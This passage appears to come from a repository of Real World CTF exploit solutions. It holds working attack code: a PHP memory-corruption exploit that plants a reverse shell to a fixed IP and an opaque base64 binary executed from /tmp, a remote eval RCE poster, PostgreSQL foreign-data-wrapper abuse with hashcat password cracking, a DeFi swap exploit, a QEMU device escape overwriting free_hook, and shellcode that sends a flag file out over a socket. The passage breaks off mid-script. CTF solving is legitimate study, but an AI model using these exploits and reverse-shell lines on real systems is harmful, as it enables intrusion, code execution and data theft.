21 | 		dup2(wp[0], 0);
22 | 		close(rp[0]);
23 | 		close(wp[1]);
24 | 		char buf[0x100];
25 | 		gets(&buf);
26 | 		puts(buf);
27 | 		int a, b, c, d, e;
28 | 		char w, x, y, z;
29 | 		scanf("(((((%lld)%c(%lld))%c(%lld))%c(%lld))%c(%lld))", &a, &w, &b, &x, &c, &y, &d, &z, &e);
30 | 		if (w == '+') {
31 | 			a += b;
32 | 		} else {
33 | 			a -= b;
34 | 		}
35 | 		if (x == '+') {
36 | 			a += c;
37 | 		} else {
38 | 			a -= c;
39 | 		}
40 | 		if (y == '+') {
41 | 			a += d;
42 | 		} else {
43 | 			a -= d;
44 | 		}
45 | 		if (z == '+') {
46 | 			a += e;
47 | 		} else {
48 | 			a -= e;
49 | 		}
50 | 		// printf("%lld %lld %lld %lld %lld", a, b, c, d, e);
51 | 		dprintf(rp[1], "%d\n", a);
52 | 		while (gets(&buf) != NULL) {
53 | 			puts(buf);
54 | 		}
55 | 	}
56 | }
57 | 


--------------------------------------------------------------------------------
/rwctf19-quals/mop/mop.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | file_put_contents("/tmp/cmb", "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");
 4 | 
 5 | $ss = array(0, 1);
 6 | $b = 'bbbbbbbbbbbbbbb';
 7 | $cmd = 'bash -c "bash -i >& /dev/tcp/192.168.50.15/4444 0>&1"';
 8 | $m = $cmd . str_repeat("\x00", 0x97 - strlen($cmd));
 9 | 
10 | var_dump(mkdir("/tmp/cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc/")); // 0x50
11 | 
12 | $za = new ZipArchive;
13 | $zb = new ZipArchive;
14 | $zc = new ZipArchive;
15 | $zc->open('/tmp/ha.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);
16 | // $zipname = '/tmp/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'; // 0x80
17 | $zipname = '/tmp/cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc/ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd'; // 0x107
18 | $zb->open($zipname, ZipArchive::CREATE | ZipArchive::OVERWRITE);
19 | $zb->addFromString('a','b');
20 | 
21 | $zipname = '/tmp/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'; // 0x37
22 | $za->open($zipname, ZipArchive::CREATE | ZipArchive::OVERWRITE);
23 | $za->addFromString('a','b');
24 | $za->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
25 | $s = $b . $b;
26 | $za->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
27 | $zb->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
28 | $a = array_unique ($ss, SORT_REGULAR);
29 | $zval_ptr_dtor = unpack('P', substr($s, 0x18, 8))[1];
30 | echo(printf("zval_ptr_dtor = %x\n", $zval_ptr_dtor));
31 | $bucket_addr = strlen($s);
32 | echo(printf("bucket_addr = %x\n", $bucket_addr));
33 | 
34 | // $zif_shell_exec = $zval_ptr_dtor - 0x395e30 + 0x2C8150; // zif_shell_exec
35 | $zif_shell_exec = $zval_ptr_dtor - 0x398460 + 0x2ca610; // zif_shell_exec
36 | 
37 | $zb->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
38 | $u = 'eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee' . pack('IIQQQQQQ', 0, 1, 0, 0, 0, 0, $bucket_addr + 0x80 - 0x18, 6) . $m;
39 | 
40 | $za->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
41 | print('here');
42 | $zc->addFromString('b', substr(pack('IIQQQQQQ', 1, 0x7, 0x4, $bucket_addr + 0x48 - 0x28, 1, 0, 0, $zif_shell_exec), 0, 0x37));
43 | unset($a);
44 | // $za->open('/tmp/', ZipArchive::CREATE | ZipArchive::OVERWRITE);
45 | 


--------------------------------------------------------------------------------
/rwctf19-quals/mop/mop.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | # payload = 'eval(hex2bin("%s"));' % open('x.php').read().replace('<?php\n', '').encode('hex')
 4 | payload = 'eval(hex2bin("%s"));' % (open('x.php', 'rb').read().replace(b'<?php\n', b'').hex())
 5 | 
 6 | print(requests.post('http://127.0.0.1:11514', data={'rce': payload}).content)
 7 | # print requests.post('http://52.53.55.151:11514', data={'rce': payload}).content
 8 | 
 9 | # base64 -d /tmp/cmb | gunzip -c > /tmp/xxx; chmod 777 /tmp/xxx; /tmp/xxx
10 | # rwctf{+++just_a_check_in_flag_have_a_good_time+++:)}
11 | 


--------------------------------------------------------------------------------
/rwctf20-21/dbaasadge.md:
--------------------------------------------------------------------------------
 1 | 1. leak "/var/lib/postgresql/10/main/pg_wal/000000010000000000000001". [rogue_mysql_server](https://github.com/rmb122/rogue_mysql_server)
 2 | 
 3 | ```sql
 4 | create server x foreign data wrapper mysql_fdw options (host $host, port '3306');
 5 | create user mapping for realuser server x options (username 'root', password '');
 6 | create foreign table y (x int) server x;
 7 | select * from y;
 8 | ```
 9 | 
10 | 2. bruteforce the password for `postgres`
11 | 
12 | ```bash
13 | hashcat --force -m 10 $(passwd) -a 3 --custom-charset1=?l?d ?1?1?1?1?1
14 | ```
15 | 
16 | 3. execute `/readflag`
17 | 
18 | ```sql
19 | create table t0(a text);
20 | create table t1(b text);
21 | insert into t0 (a) values ('host=0 user=postgres password=l2zq5');
22 | insert into t1 (b) values ('copy t1 from program ''/readflag'';');
23 | select * from dblink('host=0 user=postgres password=l2zq5', (select b from t1)) as b(a text);
24 | ```
25 | 
26 | 4. flag
27 | 
28 | ```
29 | rwctf{pop_cat_says_p1ea5e_upd4t3_your_libmysqlclient_kekw}
30 | ```
31 | 


--------------------------------------------------------------------------------
/rwctf20-21/easy_defi.txt:
--------------------------------------------------------------------------------
 1 | self = 0x130cB5a32f77a3eDE340A0AD10c22419B29Cfba1
 2 | ctt = 0x2c666A32fDD25e887D0e8a334D8D91a6aEBFBe9D
 3 | feitoken = 0xA063C4a7765B617738D99A51E6226144Ab2A7A58
 4 | pair = 0xc1058301197aBcc68338E04D8fB77b75a59A7bfe
 5 | chaitinrouter = 0xBBd682fb47C5Ca4366A5FC90fda25F12AF434fCa
 6 | chaitinbank = 0x1749136535B3682195B83C0E6C507F07e6a6D2ed
 7 | 
 8 | ctt.transfer(pair, 1)
 9 | pair.swap(90000000000000000000, 88000000000000000000, self, '')
10 | ctt.approve(chaitinrouter, 88000000000000000000)
11 | chaitinrouter.swapExactTokensForTokens(88000000000000000000, 1, [ctt, feitoken], self, 1710232679)
12 | feitoken.approve(chaitinbank, 90000000000000000000)
13 | depositFeiCointoFlag(90000000000000000000)
14 | 
15 | # rwctf{axelytxtdznhahsebhk}
16 | 


--------------------------------------------------------------------------------
/rwctf20-21/easy_escape.c:
--------------------------------------------------------------------------------
  1 | // rwctf{OhhohohO_yoU_Got_mE}
  2 | #include <stdio.h>
  3 | #include <stdlib.h>
  4 | #include <stdint.h>
  5 | #include <unistd.h>
  6 | #include <string.h>
  7 | #include <errno.h>
  8 | #include <signal.h>
  9 | #include <fcntl.h>
 10 | #include <ctype.h>
 11 | #include <termios.h>
 12 | #include <sys/types.h>
 13 | #include <sys/mman.h>
 14 | 
 15 | #define PFN_MASK ((1ULL << 55) - 1)
 16 | 
 17 | uintptr_t v2p(void *p)
 18 | {
 19 |     int fd = open("/proc/self/pagemap", O_RDONLY);
 20 |     if (fd == -1) {
 21 |         perror("open");
 22 |         return -1;
 23 |     }
 24 |     if (lseek(fd, (uintptr_t)p / 0x1000 * 8, SEEK_SET) < 0) {
 25 |         perror("lseek");
 26 |         return -1;
 27 |     }
 28 |     uint64_t val = 0;
 29 |     if (read(fd, &val, 8) != 8) {
 30 |         perror("read");
 31 |         return -1;
 32 |     }
 33 |     val &= PFN_MASK;
 34 |     val *= 0x1000;
 35 |     printf("paddr %#lx\n", val);
 36 |     return val;
 37 | }
 38 | 
 39 | int main(int argc, char **argv) {
 40 |     if (argc <= 1) {
 41 |         return -1;
 42 |     }
 43 | 
 44 |     const char *path = "/sys/devices/pci0000:00/0000:00:04.0/resource0";
 45 |     int fd = open(path, O_RDWR | O_SYNC);
 46 |     if (fd < 0) {
 47 |         perror("open");
 48 |         return -1;
 49 |     }
 50 |     void *uptr = mmap((void*)NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
 51 |     memset(uptr, 0x41, 0x1000);
 52 |     uint32_t kptr = (uint32_t)v2p(uptr);
 53 | 
 54 |     void *ptr = mmap((void*)0x40000000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
 55 |     if (ptr == MAP_FAILED) {
 56 |         perror("mmap");
 57 |         return -1;
 58 |     }
 59 |     volatile uint32_t *size = (volatile uint32_t *)ptr;
 60 |     volatile uint32_t *addr = (volatile uint32_t *)(ptr + 4);
 61 |     volatile uint32_t *result_addr = (volatile uint32_t *)(ptr + 8);
 62 |     volatile uint32_t *idx = (volatile uint32_t *)(ptr + 0xc);
 63 |     volatile uint32_t *request = (volatile uint32_t *)(ptr + 0x10);
 64 |     volatile uint32_t *create = (volatile uint32_t *)(ptr + 0x14);
 65 |     volatile uint32_t *delete = (volatile uint32_t *)(ptr + 0x18);
 66 |     uint64_t *leak = NULL;
 67 | 
 68 |     const uint32_t fun_mem_base = 0xfebf1000;
 69 | 
 70 |     // leak heap
 71 |     *size = 0x1000;
 72 |     *addr = kptr;
 73 |     *result_addr = fun_mem_base + 0x18;
 74 |     *idx = 1;
 75 |     *create = 1;
 76 |     *request;
 77 |     leak = (uint64_t *)(uptr + 0x400);
 78 |     printf("leak %#lx %#lx %#lx %#lx\n", leak[0], leak[1], leak[2], leak[3]);
 79 |     uint64_t tcache = leak[1];
 80 |     uint64_t reg = leak[2];
 81 | 
 82 |     // keep order
 83 |     *size = 0x1000;
 84 |     *create = 1;
 85 |     *delete = 1;
 86 | 
 87 |     // prepare payload
 88 |     *size = 0x1000;
 89 |     *create = 1;
 90 |     *result_addr = 0; // no delete
 91 |     *idx = 1;
 92 |     memset(leak, 0, 0x400);
 93 |     leak[6] = 0;
 94 |     leak[7] = 0x415;
 95 |     leak[8] = reg + 0x10;
 96 |     leak[9] = tcache;
 97 |     leak[10] = 0;
 98 |     leak[11] = 0x415;
 99 |     leak[12] = reg + 0x50;
100 |     leak[13] = tcache;
101 |     *request = 1;
102 | 
103 |     // leak base
104 |     *result_addr = fun_mem_base + 0x18;
105 |     *idx = 0;
106 |     *request;
107 |     leak = (uint64_t *)uptr;
108 |     uint64_t tcg_ptr = leak[0x310 / 8];
109 |     uint64_t qemu_base = tcg_ptr - 0x110dd80;
110 |     uint64_t system_plt = qemu_base + 0x2B8A74;
111 |     uint64_t getenv_got = qemu_base + 0x100DA40;
112 |     printf("tcg ptr %#lx qemu base %#lx\n", tcg_ptr, qemu_base);
113 | 
114 |     // write tcache
115 |     leak[0x278 / 8] = reg + 0x70;
116 |     *size = 0x1000;
117 |     *create = 1;
118 |     *request = 1;
119 | 
120 |     // alloc new request
121 |     *size = 0x800;
122 |     // getchar();
123 |     *create = 1;
124 | 
125 |     *result_addr = 0; // no delete
126 | 
127 | #define SETBASE(base) do { \
128 |     *idx = 0; \
129 |     uint64_t *p = uptr; \
130 |     memset(p, 0, 0x400); \
131 |     p[3] = 0x415; \
132 |     p[4] = -1; \
133 |     p[5] = reg + 0x50; \
134 |     p[6] = base; \
135 |     *request = 1; \
136 | } while (0)
137 | 
138 |     SETBASE(getenv_got);
139 | 
140 |     *idx = 1;
141 |     *request;
142 |     leak = (uint64_t *)(uptr + 0x400);
143 |     uint64_t libc_getenv = leak[0];
144 |     uint64_t libc_base = libc_getenv - 0x49020;
145 |     uint64_t free_hook = libc_base + 0x1eeb28;
146 |     printf("libc_getenv = %#lx libc_base = %#lx free_hook = %#lx\n", libc_getenv, libc_base, free_hook);
147 | 
148 |     SETBASE(free_hook);
149 |     *idx = 1;
150 |     *request;
151 |     leak[0] = system_plt;
152 |     *request = 1;
153 | 
154 |     SETBASE(reg + 0x200);
155 |     *idx = 1;
156 |     *request;
157 |     strcpy((void *)leak, argv[1]);
158 |     *request = 1;
159 | 
160 |     // getchar();
161 |     *delete = 1;
162 | 
163 |     return 0;
164 | }
165 | 


--------------------------------------------------------------------------------
/rwctf20-21/easy_works.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <fcntl.h>
 4 | #include <stdint.h>
 5 | #include <stdlib.h>
 6 | #include <unistd.h>
 7 | #include <sys/mman.h>
 8 | #include <sys/types.h>
 9 | 
10 | const char *executable = "./easy_works.elf";
11 | 
12 | int main(int argc, char *argv[])
13 | {
14 |     if (argc < 2) {
15 |         return -1;
16 |     }
17 | 
18 |     int exe = open(executable, O_RDONLY);
19 |     if (exe == -1) {
20 |         perror("open");
21 |         return -1;
22 |     }
23 | 
24 |     if (mmap((void *)0x00408000, 0x100000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0) == MAP_FAILED) {
25 |         perror("mmap");
26 |         return -1;
27 |     }
28 | 
29 |     if (lseek(exe, 0x80, SEEK_SET) == -1 || read(exe, (void *)0x00408000, 0xdf330) != 0xdf330) {
30 |         perror("read");
31 |         return -1;
32 |     }
33 |     void *ctx = (void *)0x504A00;
34 | 
35 |     void (*init_ctx)(void *, void *);
36 |     *(uintptr_t *)&init_ctx = 0x40CFC5;
37 | 
38 |     void (*stream_dec)(void *, void *, int);
39 |     void (*stream_enc)(void *, void *, int);
40 |     *(uintptr_t *)&stream_dec = 0x40DF63;
41 |     *(uintptr_t *)&stream_enc = 0x40DEED;
42 |     void (*block_dec)(void *, void *);
43 |     void (*block_enc)(void *, void *);
44 |     *(uintptr_t *)&block_dec = 0x40DE0F;
45 |     *(uintptr_t *)&block_enc = 0x40DD84;
46 |     void (*set_iv)(void *, void *);
47 |     *(uintptr_t *)&set_iv = 0x40D019;
48 | 
49 |     uint32_t (*crc32)(uint32_t, void *, uint32_t);
50 |     *(uintptr_t *)&crc32 = 0x40E93B;
51 | 
52 |     uint8_t A[0x4000] = {0}, B[0x4000] = {0};
53 |     int n = read(0, &A, 0x4000);
54 |     if (!strcmp(argv[1], "enc")) {
55 |         if (n % 0x10) {
56 |             uint8_t pad = 0x10 - n % 0x10;
57 |             while (n % 0x10) A[n++] = pad;
58 |         }
59 |         init_ctx(ctx, (void *)0x4D251F);
60 |         set_iv(ctx, "12345678abcdefgh");
61 |         stream_enc(ctx, &A, n);
62 |         memcpy(&B, &A, 0x4000);
63 |         init_ctx(ctx, (void *)0x4D251F);
64 |         set_iv(ctx, "12345678abcdefgh");
65 |         stream_dec(ctx, &B, n);
66 |         // write(1, &B, n);
67 |     } else if (!strcmp(argv[1], "crc")) {
68 |         *(uint32_t *)&A[0xc] = 0;
69 |         uint32_t res = crc32(0, &A, n);
70 |         *(uint32_t *)&A[0xc] = res;
71 |     }
72 |     write(1, &A, n);
73 | 
74 |     return 0;
75 | }
76 | 


--------------------------------------------------------------------------------
/rwctf20-21/easy_works.py:
--------------------------------------------------------------------------------
  1 | from pwn import *
  2 | 
  3 | # rwctf{3af93fd83c6d9b4188d236225347e480}
  4 | 
  5 | context.arch = 'i386'
  6 | 
  7 | HOST = '1.2.3.4'
  8 | PORT = 0x4141
  9 | 
 10 | def encrypt(s):
 11 |     p = process(['./e', 'enc'])
 12 |     p.send(s)
 13 |     p.shutdown()
 14 |     d = p.recvall()
 15 |     assert len(d) >= len(s)
 16 |     print('enc %d %s => %d %s' % (len(s), s.hex(), len(d), d.hex()))
 17 |     return d
 18 | 
 19 | def fix_crc(s):
 20 |     p = process(['./e', 'crc'])
 21 |     p.send(s)
 22 |     p.shutdown()
 23 |     d = p.recvall()
 24 |     assert len(d) == len(s)
 25 |     print('crc %s => %s' % (s.hex(), d.hex()))
 26 |     return d
 27 | 
 28 | magic = b'\x7E\x6D\x5C\x4B'
 29 | 
 30 | _open = 0x487E6E
 31 | _read = 0x487925
 32 | _printf = 0x482C0A
 33 | _socket = 0x4B1DB2
 34 | _connect = 0x4B1B53
 35 | zbufSockBufSendto = 0x454C4F
 36 | ebp = 0x677608
 37 | filename = ebp - 0x30 + 0x200
 38 | sockaddr = filename + 0x20
 39 | payload = b'0.0.0.0\x00'.ljust(0x30, b'X')
 40 | payload += p32(ebp - 0x300) + p32(ebp + 8)
 41 | payload += asm('''
 42 | sub esp, 0x400
 43 | xor eax, eax
 44 | mov [esp+8], eax
 45 | ; mov eax, 2
 46 | mov [esp+4], eax
 47 | mov eax, %#x
 48 | mov [esp], eax
 49 | mov eax, %#x
 50 | call eax
 51 | 
 52 | mov ecx, 0x100
 53 | mov [esp+8], ecx
 54 | lea ebx, [esp + 0x80]
 55 | mov [esp+4], ebx
 56 | mov [esp], eax
 57 | mov edx, %#x
 58 | call edx
 59 | 
 60 | xor eax, eax
 61 | mov [esp+8], eax
 62 | inc al
 63 | mov [esp+4], eax
 64 | inc al
 65 | mov [esp], eax
 66 | mov eax, %#x
 67 | call eax
 68 | 
 69 | mov [esp+0x60], eax
 70 | 
 71 | mov [esp], eax
 72 | mov eax, %#x
 73 | mov [esp+4], eax
 74 | mov eax, 16
 75 | mov [esp+8], eax
 76 | mov eax, %#x
 77 | call eax
 78 | 
 79 | mov eax, [esp+0x60]
 80 | mov [esp], eax
 81 | lea ebx, [esp + 0x80]
 82 | mov [esp+4], ebx
 83 | mov eax, 0x100
 84 | mov [esp+8], eax
 85 | xor eax, eax
 86 | mov [esp+0xc], eax
 87 | mov [esp+0x10], eax
 88 | mov [esp+0x14], eax
 89 | mov eax, %#x
 90 | call eax
 91 | ''' % (filename, _open, _read, _socket, sockaddr, _connect, zbufSockBufSendto))
 92 | payload = payload.ljust(0x200)
 93 | payload += b'/ata01:1/flag\x00'.ljust(0x20)
 94 | payload += b'\x10\x02' + p16(PORT) + bytes(map(int, HOST.split('.')))
 95 | 
 96 | master_addr = encrypt(p32(0) + p16(len(payload)) + payload)
 97 | set_master_addr_pkt = fix_crc(magic + p16(len(master_addr)) + p8(3) + p8(2) + p32(0) + p32(0) + master_addr)
 98 | 
 99 | key = encrypt(b'dorimifasolaxi\x00')
100 | req_beat_pkt = fix_crc(magic + p16(len(key)) + p8(1) + p8(2) + p32(0) + p32(0) + key)
101 | 
102 | r = remote('13.52.189.117', 39707, typ='udp')
103 | 
104 | r.send(set_master_addr_pkt)
105 | raw_input('beat')
106 | r.send(req_beat_pkt)
107 | 


--------------------------------------------------------------------------------
/rwctf20-21/game2048.py:
--------------------------------------------------------------------------------
  1 | from pwn import *
  2 | 
  3 | # $ cat flag_09f1df36b8402c05962f693e42c76152
  4 | # rwctf{rAge_Against_th3_dy1ng_0f_the_1ight}
  5 | 
  6 | host = '54.176.255.241'
  7 | 
  8 | p = remote(host, 54321)
  9 | 
 10 | p.recvuntil('//')
 11 | p.recvuntil(':')
 12 | port = int(p.recv(timeout=0.1))
 13 | print('remote port', port)
 14 | 
 15 | def make_conn():
 16 |     return remote(host, port)
 17 | 
 18 | # reg
 19 | user = 's'
 20 | pwd = 's'
 21 | 
 22 | c0 = make_conn()
 23 | c0.send('''GET /register?name=%s&passwd=%s&re_passwd=%s HTTP/1.1\r\n\r\n''' % (user, pwd, pwd))
 24 | c0.recvall()
 25 | c0.close()
 26 | 
 27 | comment_size = 0x300 - 1
 28 | content_size = comment_size + 0x100
 29 | obj_size = 0x2020 - 1
 30 | large_content_size = 0x2020 * 2 + 0x10
 31 | url = '/index.html'.rjust(comment_size, '/')
 32 | url += '?' + 'x' * 0x100
 33 | 
 34 | cx = make_conn()
 35 | c1 = make_conn()
 36 | c2 = make_conn()
 37 | c3 = make_conn()
 38 | c4 = make_conn()
 39 | c5 = make_conn()
 40 | c6 = make_conn()
 41 | c10 = make_conn()
 42 | 
 43 | req1 = '''GET /submit HTTP/1.1\r\n'''
 44 | req1 += '''Cookie: name=%s;pass=%s;\r\n''' % (user, pwd)
 45 | req1 += '''Content-Length: %d\r\n\r\n''' % (content_size)
 46 | req1 += ('word=' + 'A' * comment_size + '&').ljust(content_size, '\x00')
 47 | 
 48 | c2.send('''GET /submit HTTP/1.1\r\n''')
 49 | c2.send('''Cookie: name=%s;pass=%s;\r\n''' % (user, pwd))
 50 | 
 51 | c5.send('''GET /submit HTTP/1.1\r\n''')
 52 | c5.send('''Cookie: name=%s;pass=%s;\r\n''' % (user, pwd))
 53 | 
 54 | c6.send('''GET /submit HTTP/1.1\r\n''')
 55 | c6.send('''Cookie: name=%s;pass=%s;\r\n''' % (user, pwd))
 56 | 
 57 | c10.send('''GET /submit HTTP/1.1\r\n''')
 58 | c10.send('''Cookie: name=%s;pass=%s;\r\n''' % (user, pwd))
 59 | 
 60 | # allocate comment
 61 | raw_input('c1')
 62 | c1.send(req1)
 63 | raw_input('c2')
 64 | c2.send('''Content-Length: %d\r\n\r\n''' % (content_size))
 65 | raw_input('c3')
 66 | c3.send('''GET %s HTTP/1.1\r\n''' % url)
 67 | c3.send('''Cookie: name=%s;pass=%s;\r\n''' % (user, pwd))
 68 | raw_input('c5')
 69 | c5.send('''Content-Length: %d\r\n\r\n''' % (large_content_size))
 70 | raw_input('c2+')
 71 | path = '/../../../../../proc/self/maps'.rjust(comment_size, '/')
 72 | c2.send(('word=' + path + '&').ljust(content_size, '\x00'))
 73 | raw_input('c3+')
 74 | c3.send('\r\n')
 75 | c3.recvuntil('\r\n\r\n')
 76 | maps = c3.recvall()
 77 | c3.close()
 78 | text_base = 0
 79 | libc_base = 0
 80 | heap_base = 0
 81 | for line in maps.split(b'\n')[::-1]:
 82 |     if line == b'': continue
 83 |     addr = int(line.split(b'-')[0], 16)
 84 |     if b'libc-2' in line:
 85 |         libc_base = addr
 86 |     elif b'[heap]' in line:
 87 |         heap_base = addr
